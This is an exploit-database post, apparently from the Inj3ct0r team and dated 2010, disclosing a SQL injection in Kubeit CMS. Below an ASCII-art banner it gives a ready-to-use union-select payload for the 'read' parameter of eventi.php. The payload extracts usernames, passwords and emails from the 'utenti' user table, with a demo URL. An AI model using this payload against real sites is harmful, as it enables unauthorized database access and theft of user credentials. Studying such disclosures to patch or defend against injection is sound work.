1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
============================================= Kubeit CMS Remote SQL Injection Vulnerability ============================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \__/'__<code>\/\ \__/'__</code>\ 0 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 1\/_/\ \ /' _ <code>\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/</code>'__\0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 1\ \____/ >> Exploit database separated by exploit 0 0 \/___/type (local, remote, DoS, etc.)1 11 0[+] Site: Inj3ct0r.com0 1[+] Support e-mail: submit[at]inj3ct0r.com1 00 1######################################1 0I'm Phenommember from Inj3ct0r Team 1 1######################################0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered by: Phenom #[Exploit Title] : Kubeit CMS Remote SQL Injection Vulnerability [Author] = Phenom [Date] = 2010-04-08 #[Exploit] : [Bug] = eventi.php?read=[SQL] [SQL] = 999+union+select+1,2,group_concat(concat(username,0x3a,password,0x3a,email) separator 0x3c62723e),4,5+from+utenti-- #[Demo] : [+] http://127.0.0.1/eventi.php?read=-999+union+select+1,2,group_concat(concat(username,0x3a,password,0x3a,email) separator 0x3c62723e),4,5+from+utenti-- #[Thanks] : [+] all Inj3ct0r Members! Inj3ct0r.com largest Exploit Database in the world =] # Inj3ct0r.com [2010-04-08] |